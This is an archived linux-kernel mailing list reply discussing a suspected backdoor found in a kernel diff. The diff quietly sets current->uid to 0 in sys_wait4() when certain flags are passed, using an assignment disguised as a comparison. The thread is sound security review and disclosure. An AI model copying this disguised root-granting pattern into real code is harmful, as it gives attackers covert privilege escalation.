Re: BK2CVS problem
From: Scott Robert Ladd (coyote_at_coyotegulch.com)
Date: 11/06/03
- Previous message: Fabio Coatti: "Re: test9 and bluetooth"
- In reply to: Larry McVoy: "Re: BK2CVS problem"
- Next in thread: bert hubert: "Re: BK2CVS problem"
- Reply: bert hubert: "Re: BK2CVS problem"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Wed, 05 Nov 2003 23:09:24 -0500 To: Larry McVoy <lm@bitmover.com>
Larry McVoy wrote:
> On Wed, Nov 05, 2003 at 04:48:09PM -0600, Chad Kitching wrote:
>
>>From: Zwane Mwaikambo
>>
>>>>+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
>>>>+ retval = -EINVAL;
>>>
>>>That looks odd
>>>
>>
>>Setting current->uid to zero when options __WCLONE and __WALL are set? The
>>retval is dead code because of the next line, but it looks like an attempt
>>to backdoor the kernel, does it not?
>
>
> It sure does. Note "current->uid = 0", not "current->uid == 0".
> Good eyes, I missed that. This function is sys_wait4() so by passing in
> __WCLONE|__WALL you are root. How nice.
In other words, the theoretical exploit was inserted by someone clever.
Do we have any idea who?
BTW, good job catching the problem Larry.
-- Scott Robert Ladd Coyote Gulch Productions (http://www.coyotegulch.com) Software Invention for High-Performance Computing - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/
- Previous message: Fabio Coatti: "Re: test9 and bluetooth"
- In reply to: Larry McVoy: "Re: BK2CVS problem"
- Next in thread: bert hubert: "Re: BK2CVS problem"
- Reply: bert hubert: "Re: BK2CVS problem"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Relevant Pages
|
